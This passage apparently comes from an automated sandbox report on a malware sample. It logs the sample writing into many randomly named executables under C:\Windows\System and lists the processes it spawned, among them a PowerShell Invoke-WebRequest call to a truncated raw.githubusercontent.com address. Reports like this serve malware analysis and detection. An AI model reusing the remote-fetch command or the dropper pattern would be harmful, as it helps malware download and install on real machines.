PID 1420 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\bLCdRZK.exe
PID 1420 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\DOCaKvf.exe
PID 1420 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\DOCaKvf.exe
PID 1420 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\DOCaKvf.exe
PID 1420 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\goZRcqI.exe
PID 1420 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\goZRcqI.exe
PID 1420 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\goZRcqI.exe
PID 1420 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\UNdjKdF.exe
PID 1420 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\UNdjKdF.exe
PID 1420 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\UNdjKdF.exe
PID 1420 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\rydwIIT.exe
PID 1420 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\rydwIIT.exe
PID 1420 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\rydwIIT.exe
PID 1420 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\StxMTvc.exe
PID 1420 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\StxMTvc.exe
PID 1420 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\StxMTvc.exe
PID 1420 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\GvQQrrE.exe
PID 1420 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\GvQQrrE.exe
PID 1420 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\GvQQrrE.exe
PID 1420 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\gbbVjtF.exe
PID 1420 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\gbbVjtF.exe
PID 1420 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\gbbVjtF.exe
PID 1420 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\fHZKZjx.exe
PID 1420 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\fHZKZjx.exe
PID 1420 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\fHZKZjx.exe
PID 1420 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ThbrLJt.exe
PID 1420 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ThbrLJt.exe
PID 1420 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ThbrLJt.exe
PID 1420 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ilFAkif.exe
PID 1420 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ilFAkif.exe
PID 1420 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ilFAkif.exe
PID 1420 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\nEdxnNp.exe
PID 1420 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\nEdxnNp.exe
PID 1420 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\nEdxnNp.exe
PID 1420 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\GkOIZTx.exe
PID 1420 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\GkOIZTx.exe
PID 1420 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\GkOIZTx.exe
PID 1420 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\CJyHorP.exe
PID 1420 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\CJyHorP.exe
PID 1420 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\CJyHorP.exe
PID 1420 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\PviXJzn.exe
PID 1420 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\PviXJzn.exe
PID 1420 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\PviXJzn.exe
PID 1420 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ZOUgimV.exe
PID 1420 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ZOUgimV.exe
PID 1420 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ZOUgimV.exe
PID 1420 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\xIGeloP.exe
PID 1420 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\xIGeloP.exe
PID 1420 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\xIGeloP.exe
PID 1420 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\CdeYIKP.exe
PID 1420 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\CdeYIKP.exe
PID 1420 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\CdeYIKP.exe
PID 1420 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\vcmyOjQ.exe
PID 1420 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\vcmyOjQ.exe
PID 1420 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\vcmyOjQ.exe
PID 1420 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\wSIGoJU.exe
PID 1420 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\wSIGoJU.exe
PID 1420 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\wSIGoJU.exe
PID 1420 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\dkBqWVh.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\bLCdRZK.exe

C:\Windows\System\bLCdRZK.exe

C:\Windows\System\DOCaKvf.exe

C:\Windows\System\DOCaKvf.exe

C:\Windows\System\goZRcqI.exe

C:\Windows\System\goZRcqI.exe

C:\Windows\System\UNdjKdF.exe

C:\Windows\System\UNdjKdF.exe

C:\Windows\System\rydwIIT.exe

C:\Windows\System\rydwIIT.exe

C:\Windows\System\StxMTvc.exe

C:\Windows\System\StxMTvc.exe

C:\Windows\System\GvQQrrE.exe

C:\Windows\System\GvQQrrE.exe

C:\Windows\System\gbbVjtF.exe

C:\Windows\System\gbbVjtF.exe

C:\Windows\System\fHZKZjx.exe

C:\Windows\System\fHZKZjx.exe

C:\Windows\System\ThbrLJt.exe

C:\Windows\System\ThbrLJt.exe

C:\Windows\System\ilFAkif.exe

C:\Windows\System\ilFAkif.exe

C:\Windows\System\nEdxnNp.exe

C:\Windows\System\nEdxnNp.exe

C:\Windows\System\GkOIZTx.exe

C:\Windows\System\GkOIZTx.exe

C:\Windows\System\CJyHorP.exe

C:\Windows\System\CJyHorP.exe

C:\Windows\System\PviXJzn.exe

C:\Windows\System\PviXJzn.exe

C:\Windows\System\ZOUgimV.exe

C:\Windows\System\ZOUgimV.exe

C:\Windows\System\xIGeloP.exe

C:\Windows\System\xIGeloP.exe

C:\Windows\System\CdeYIKP.exe

C:\Windows\System\CdeYIKP.exe

C:\Windows\System\vcmyOjQ.exe

C:\Windows\System\vcmyOjQ.exe

C:\Windows\System\wSIGoJU.exe

C:\Windows\System\wSIGoJU.exe

C:\Windows\System\dkBqWVh.exe

C:\Windows\System\dkBqWVh.exe

C:\Windows\System\btguKPq.exe

C:\Windows\System\btguKPq.exe

C:\Windows\System\uuhHKza.exe

C:\Windows\System\uuhHKza.exe

C:\Windows\System\RhvekTL.exe

C:\Windows\System\RhvekTL.exe

C:\Windows\System\bOzepYI.exe

C:\Windows\System\bOzepYI.exe

C:\Windows\System\CeosUzc.exe

C:\Windows\System\CeosUzc.exe

C:\Windows\System\BtYGvZM.exe

C:\Windows\System\BtYGvZM.exe

C:\Windows\System\EewyFxf.exe

C:\Windows\System\EewyFxf.exe

C:\Windows\System\tjYywdo.exe

C:\Windows\System\tjYywdo.exe

C:\Windows\System\dREvuDU.exe

C:\Windows\System\dREvuDU.exe

C:\Windows\System\VwtiHwr.exe

C:\Windows\System\VwtiHwr.exe

C:\Windows\System\zrqaQvT.exe

C:\Windows\System\zrqaQvT.exe

C:\Windows\System\NwLpIij.exe

C:\Windows\System\NwLpIij.exe

C:\Windows\System\YuALfYi.exe

C:\Windows\System\YuALfYi.exe

C:\Windows\System\oKwuNUp.exe

C:\Windows\System\oKwuNUp.exe

C:\Windows\System\BBGFgOJ.exe

C:\Windows\System\BBGFgOJ.exe

C:\Windows\System\drXrZRG.exe

C:\Windows\System\drXrZRG.exe

C:\Windows\System\dwsfasV.exe

C:\Windows\System\dwsfasV.exe

C:\Windows\System\vPycByZ.exe

C:\Windows\System\vPycByZ.exe

C:\Windows\System\EnrLysM.exe

C:\Windows\System\EnrLysM.exe

C:\Windows\System\QBlxqUM.exe

C:\Windows\System\QBlxqUM.exe

C:\Windows\System\yZroYYw.exe

C:\Windows\System\yZroYYw.exe

C:\Windows\System\AMbHAmt.exe

C:\Windows\System\AMbHAmt.exe

C:\Windows\System\nZSrPbp.exe

C:\Windows\System\nZSrPbp.exe

C:\Windows\System\zFtJTWS.exe

C:\Windows\System\zFtJTWS.exe

C:\Windows\System\ctTjRNm.exe

C:\Windows\System\ctTjRNm.exe

C:\Windows\System\iltoLBB.exe

C:\Windows\System\iltoLBB.exe

C:\Windows\System\jwoMnUa.exe

C:\Windows\System\jwoMnUa.exe

C:\Windows\System\QTlwTkN.exe

C:\Windows\System\QTlwTkN.exe

C:\Windows\System\Jzxoeyq.exe

C:\Windows\System\Jzxoeyq.exe

C:\Windows\System\oizrNoG.exe

C:\Windows\System\oizrNoG.exe

C:\Windows\System\vGspeWq.exe

C:\Windows\System\vGspeWq.exe

C:\Windows\System\BwbiUiE.exe

C:\Windows\System\BwbiUiE.exe

C:\Windows\System\TCxOEdA.exe

C:\Windows\System\TCxOEdA.exe

C:\Windows\System\xmBDPGd.exe

C:\Windows\System\xmBDPGd.exe

C:\Windows\System\UTkfwlz.exe

C:\Windows\System\UTkfwlz.exe

C:\Windows\System\pagvIlD.exe

C:\Windows\System\pagvIlD.exe

C:\Windows\System\fttSTmm.exe

C:\Windows\System\fttSTmm.exe

C:\Windows\System\tHuhOsp.exe

C:\Windows\System\tHuhOsp.exe

C:\Windows\System\EqCKexC.exe

C:\Windows\System\EqCKexC.exe

C:\Windows\System\hHUbnLO.exe

C:\Windows\System\hHUbnLO.exe

C:\Windows\System\ltsTHCh.exe

C:\Windows\System\ltsTHCh.exe

C:\Windows\System\yUmwMcy.exe

C:\Windows\System\yUmwMcy.exe

C:\Windows\System\DckbVhx.exe

C:\Windows\System\DckbVhx.exe

C:\Windows\System\rSdhCAX.exe

C:\Windows\System\rSdhCAX.exe

C:\Windows\System\DXyQXvu.exe

C:\Windows\System\DXyQXvu.exe

C:\Windows\System\wmifNow.exe

C:\Windows\System\wmifNow.exe

C:\Windows\System\jLReZhw.exe

C:\Windows\System\jLReZhw.exe

C:\Windows\System\lQPZYiN.exe

C:\Windows\System\lQPZYiN.exe

C:\Windows\System\wTgixRC.exe

C:\Windows\System\wTgixRC.exe

C:\Windows\System\kLEHJCa.exe

C:\Windows\System\kLEHJCa.exe

C:\Windows\System\ZnACQuE.exe

C:\Windows\System\ZnACQuE.exe

C:\Windows\System\TwMiAEQ.exe

C:\Windows\System\TwMiAEQ.exe

C:\Windows\System\xYhzHnG.exe

C:\Windows\System\xYhzHnG.exe

C:\Windows\System\YfcRlPo.exe

C:\Windows\System\YfcRlPo.exe

C:\Windows\System\OanEQgD.exe

C:\Windows\System\OanEQgD.exe

C:\Windows\System\MkAbTIu.exe

C:\Windows\System\MkAbTIu.exe

C:\Windows\System\zjmYDSC.exe

C:\Windows\System\zjmYDSC.exe

C:\Windows\System\oLfPXuU.exe

C:\Windows\System\oLfPXuU.exe

C:\Windows\System\dHxOshS.exe

C:\Windows\System\dHxOshS.exe

C:\Windows\System\ztofafl.exe

C:\Windows\System\ztofafl.exe

C:\Windows\System\apOMHlu.exe

C:\Windows\System\apOMHlu.exe

C:\Windows\System\qPqkFRV.exe

C:\Windows\System\qPqkFRV.exe

C:\Windows\System\qoscOeL.exe

C:\Windows\System\qoscOeL.exe

C:\Windows\System\OjKAMpl.exe

C:\Windows\System\OjKAMpl.exe

C:\Windows\System\GFBpfnF.exe

C:\Windows\System\GFBpfnF.exe

C:\Windows\System\nRMkQIp.exe

C:\Windows\System\nRMkQIp.exe

C:\Windows\System\zmBAJAx.exe

C:\Windows\System\zmBAJAx.exe

C:\Windows\System\jOhDmCp.exe

C:\Windows\System\jOhDmCp.exe

C:\Windows\System\mRAzoOJ.exe

C:\Windows\System\mRAzoOJ.exe

C:\Windows\System\oyJOYSq.exe

C:\Windows\System\oyJOYSq.exe

C:\Windows\System\BLSvcvS.exe

C:\Windows\System\BLSvcvS.exe

C:\Windows\System\bmDjpdp.exe

C:\Windows\System\bmDjpdp.exe

C:\Windows\System\FysOKFt.exe

C:\Windows\System\FysOKFt.exe

C:\Windows\System\sFMjlNx.exe

C:\Windows\System\sFMjlNx.exe

C:\Windows\System\yJPAIIT.exe

C:\Windows\System\yJPAIIT.exe

C:\Windows\System\jhdJMEX.exe

C:\Windows\System\jhdJMEX.exe

C:\Windows\System\faHqQcd.exe

C:\Windows\System\faHqQcd.exe

C:\Windows\System\PLlCDWJ.exe

C:\Windows\System\PLlCDWJ.exe

C:\Windows\System\RKgMCRA.exe

C:\Windows\System\RKgMCRA.exe

C:\Windows\System\faajfVC.exe

C:\Windows\System\faajfVC.exe

C:\Windows\System\sXFqzsz.exe

C:\Windows\System\sXFqzsz.exe

C:\Windows\System\pvjFPOA.exe

C:\Windows\System\pvjFPOA.exe

C:\Windows\System\TZYhDpv.exe

C:\Windows\System\TZYhDpv.exe

C:\Windows\System\wNAbuDp.exe

C:\Windows\System\wNAbuDp.exe

C:\Windows\System\NNnrNdb.exe

C:\Windows\System\NNnrNdb.exe

C:\Windows\System\evTgmRV.exe

C:\Windows\System\evTgmRV.exe

C:\Windows\System\VKdhwvY.exe

C:\Windows\System\VKdhwvY.exe

C:\Windows\System\cBjupnF.exe

C:\Windows\System\cBjupnF.exe

C:\Windows\System\RTUKFMb.exe

C:\Windows\System\RTUKFMb.exe

C:\Windows\System\BHwYEmi.exe

C:\Windows\System\BHwYEmi.exe

C:\Windows\System\oxfpbVS.exe

C:\Windows\System\oxfpbVS.exe

C:\Windows\System\wdOVDlz.exe

C:\Windows\System\wdOVDlz.exe

C:\Windows\System\FilqlxJ.exe

C:\Windows\System\FilqlxJ.exe

C:\Windows\System\xgbjAmg.exe

C:\Windows\System\xgbjAmg.exe

C:\Windows\System\UaKMLlV.exe

C:\Windows\System\UaKMLlV.exe

C:\Windows\System\jJmgEEy.exe

C:\Windows\System\jJmgEEy.exe

C:\Windows\System\wnpeJIj.exe

C:\Windows\System\wnpeJIj.exe

C:\Windows\System\jBBKXhi.exe

C:\Windows\System\jBBKXhi.exe

C:\Windows\System\BfeWsFp.exe

C:\Windows\System\BfeWsFp.exe

C:\Windows\System\xhOLOfC.exe

C:\Windows\System\xhOLOfC.exe

C:\Windows\System\rwuzBKl.exe

C:\Windows\System\rwuzBKl.exe

C:\Windows\System\VNQQcql.exe

C:\Windows\System\VNQQcql.exe

C:\Windows\System\hywqqYL.exe

C:\Windows\System\hywqqYL.exe

C:\Windows\System\vxzpMLg.exe

C:\Windows\System\vxzpMLg.exe

C:\Windows\System\hfEMgZA.exe

C:\Windows\System\hfEMgZA.exe

C:\Windows\System\rcwBpss.exe

C:\Windows\System\rcwBpss.exe

C:\Windows\System\ILmZPQn.exe

C:\Windows\System\ILmZPQn.exe

C:\Windows\System\ndCNBmf.exe

C:\Windows\System\ndCNBmf.exe

C:\Windows\System\CONdPjO.exe

C:\Windows\System\CONdPjO.exe

C:\Windows\System\qyDwLFN.exe

C:\Windows\System\qyDwLFN.exe

C:\Windows\System\ZypBnik.exe

C:\Windows\System\ZypBnik.exe

C:\Windows\System\sIMZQYI.exe

C:\Windows\System\sIMZQYI.exe

C:\Windows\System\RIfRYAU.exe

C:\Windows\System\RIfRYAU.exe

C:\Windows\System\WHBuQee.exe

C:\Windows\System\WHBuQee.exe

C:\Windows\System\UkBmOYb.exe

C:\Windows\System\UkBmOYb.exe

C:\Windows\System\UUXtBkv.exe

C:\Windows\System\UUXtBkv.exe

C:\Windows\System\ZNqFfhv.exe

C:\Windows\System\ZNqFfhv.exe

C:\Windows\System\vqadpgy.exe

C:\Windows\System\vqadpgy.exe

C:\Windows\System\pHGkfVI.exe

C:\Windows\System\pHGkfVI.exe

C:\Windows\System\YPFORkR.exe

C:\Windows\System\YPFORkR.exe

C:\Windows\System\hdDZDiJ.exe

C:\Windows\System\hdDZDiJ.exe

C:\Windows\System\lCFbaCF.exe

C:\Windows\System\lCFbaCF.exe

C:\Windows\System\EueCKEp.exe

C:\Windows\System\EueCKEp.exe

C:\Windows\System\lxnBqGC.exe

C:\Windows\System\lxnBqGC.exe

C:\Windows\System\NWGKrAV.exe

C:\Windows\System\NWGKrAV.exe

C:\Windows\System\mMhYQvU.exe

C:\Windows\System\mMhYQvU.exe

C:\Windows\System\MalCWPg.exe

C:\Windows\System\MalCWPg.exe

C:\Windows\System\VlLpONf.exe

C:\Windows\System\VlLpONf.exe

C:\Windows\System\BkrVXNL.exe

C:\Windows\System\BkrVXNL.exe

C:\Windows\System\wLNpFQb.exe

C:\Windows\System\wLNpFQb.exe

C:\Windows\System\CGCdZsE.exe

C:\Windows\System\CGCdZsE.exe

C:\Windows\System\nRMZoIJ.exe

C:\Windows\System\nRMZoIJ.exe

C:\Windows\System\YpjArIq.exe

C:\Windows\System\YpjArIq.exe

C:\Windows\System\yVNQUCc.exe

C:\Windows\System\yVNQUCc.exe

C:\Windows\System\DPAucoZ.exe

C:\Windows\System\DPAucoZ.exe

C:\Windows\System\knVvqQT.exe

C:\Windows\System\knVvqQT.exe

C:\Windows\System\xbhJodd.exe

C:\Windows\System\xbhJodd.exe

C:\Windows\System\DDpQREn.exe

C:\Windows\System\DDpQREn.exe

C:\Windows\System\gBAxUNc.exe

C:\Windows\System\gBAxUNc.exe

C:\Windows\System\FtICuJj.exe

C:\Windows\System\FtICuJj.exe

C:\Windows\System\kguwRje.exe

C:\Windows\System\kguwRje.exe

C:\Windows\System\NKdQZWf.exe

C:\Windows\System\NKdQZWf.exe

C:\Windows\System\aygbHxj.exe

C:\Windows\System\aygbHxj.exe

C:\Windows\System\IPNjGsM.exe

C:\Windows\System\IPNjGsM.exe

C:\Windows\System\zSzFpqE.exe

C:\Windows\System\zSzFpqE.exe

C:\Windows\System\rTwecCy.exe

C:\Windows\System\rTwecCy.exe

C:\Windows\System\VZgZUqE.exe

C:\Windows\System\VZgZUqE.exe

C:\Windows\System\FVstEHR.exe

C:\Windows\System\FVstEHR.exe

C:\Windows\System\OnhVrET.exe

C:\Windows\System\OnhVrET.exe

C:\Windows\System\XjDvxkJ.exe

C:\Windows\System\XjDvxkJ.exe

C:\Windows\System\cEwHwsO.exe

C:\Windows\System\cEwHwsO.exe

C:\Windows\System\DqAmnTo.exe

C:\Windows\System\DqAmnTo.exe

C:\Windows\System\WpyhqGj.exe

C:\Windows\System\WpyhqGj.exe

C:\Windows\System\YYFJaRe.exe

C:\Windows\System\YYFJaRe.exe

C:\Windows\System\AktdbmP.exe

C:\Windows\System\AktdbmP.exe

C:\Windows\System\QQHfevL.exe

C:\Windows\System\QQHfevL.exe

C:\Windows\System\rCIqFLR.exe

C:\Windows\System\rCIqFLR.exe

C:\Windows\System\RjdprwD.exe

C:\Windows\System\RjdprwD.exe

C:\Windows\System\oyKHmSG.exe

C:\Windows\System\oyKHmSG.exe

C:\Windows\System\jzoEIdK.exe

C:\Windows\System\jzoEIdK.exe

C:\Windows\System\ycBCEtN.exe

C:\Windows\System\ycBCEtN.exe

C:\Windows\System\cwCFpxd.exe

C:\Windows\System\cwCFpxd.exe

C:\Windows\System\bljVwtx.exe

C:\Windows\System\bljVwtx.exe

C:\Windows\System\oEujuyU.exe

C:\Windows\System\oEujuyU.exe

C:\Windows\System\qGqErWZ.exe

C:\Windows\System\qGqErWZ.exe

C:\Windows\System\DUOqDNO.exe

C:\Windows\System\DUOqDNO.exe

C:\Windows\System\LKzvfVv.exe

C:\Windows\System\LKzvfVv.exe

C:\Windows\System\iohPliD.exe

C:\Windows\System\iohPliD.exe

C:\Windows\System\KzNpHNS.exe

C:\Windows\System\KzNpHNS.exe

C:\Windows\System\cnbzIxJ.exe

C:\Windows\System\cnbzIxJ.exe

C:\Windows\System\fPwJmCa.exe

C:\Windows\System\fPwJmCa.exe

C:\Windows\System\bHoOOZz.exe

C:\Windows\System\bHoOOZz.exe

C:\Windows\System\qHXFcKw.exe

C:\Windows\System\qHXFcKw.exe

C:\Windows\System\zcXIlWb.exe

C:\Windows\System\zcXIlWb.exe

C:\Windows\System\oDjNuie.exe

C:\Windows\System\oDjNuie.exe

C:\Windows\System\GyUQIZB.exe

C:\Windows\System\GyUQIZB.exe

C:\Windows\System\zVUoSJo.exe

C:\Windows\System\zVUoSJo.exe

C:\Windows\System\Mawxuba.exe

C:\Windows\System\Mawxuba.exe

C:\Windows\System\NGxUfBE.exe

C:\Windows\System\NGxUfBE.exe

C:\Windows\System\NwsWslQ.exe

C:\Windows\System\NwsWslQ.exe

C:\Windows\System\AbGXjPW.exe

C:\Windows\System\AbGXjPW.exe

C:\Windows\System\FQToicq.exe

C:\Windows\System\FQToicq.exe

C:\Windows\System\PAzBQgc.exe

C:\Windows\System\PAzBQgc.exe

C:\Windows\System\SbCWPwt.exe

C:\Windows\System\SbCWPwt.exe

C:\Windows\System\ubWqioz.exe

C:\Windows\System\ubWqioz.exe

C:\Windows\System\SpIYorN.exe

C:\Windows\System\SpIYorN.exe

C:\Windows\System\kaltkGI.exe

C:\Windows\System\kaltkGI.exe

C:\Windows\System\LBPrzsq.exe

C:\Windows\System\LBPrzsq.exe

C:\Windows\System\WRJEPey.exe

C:\Windows\System\WRJEPey.exe

C:\Windows\System\FyIvfZf.exe

C:\Windows\System\FyIvfZf.exe

C:\Windows\System\bcfZAvl.exe

C:\Windows\System\bcfZAvl.exe

C:\Windows\System\qICglBl.exe

C:\Windows\System\qICglBl.exe

C:\Windows\System\BjGNJcM.exe

C:\Windows\System\BjGNJcM.exe

C:\Windows\System\qCSvRxZ.exe

C:\Windows\System\qCSvRxZ.exe

C:\Windows\System\oHfFOMY.exe

C:\Windows\System\oHfFOMY.exe

C:\Windows\System\uoMoJpV.exe

C:\Windows\System\uoMoJpV.exe

C:\Windows\System\HHtwfVt.exe

C:\Windows\System\HHtwfVt.exe

C:\Windows\System\tCMGtrz.exe

C:\Windows\System\tCMGtrz.exe

C:\Windows\System\dzABDKu.exe

C:\Windows\System\dzABDKu.exe

C:\Windows\System\uFSZYfL.exe

C:\Windows\System\uFSZYfL.exe

C:\Windows\System\awOtgeN.exe

C:\Windows\System\awOtgeN.exe

C:\Windows\System\XwqCXEX.exe

C:\Windows\System\XwqCXEX.exe

C:\Windows\System\wOTpQdu.exe

C:\Windows\System\wOTpQdu.exe

C:\Windows\System\jNlbSXW.exe

C:\Windows\System\jNlbSXW.exe

C:\Windows\System\PHXZRbg.exe

C:\Windows\System\PHXZRbg.exe

C:\Windows\System\ImEZvrS.exe

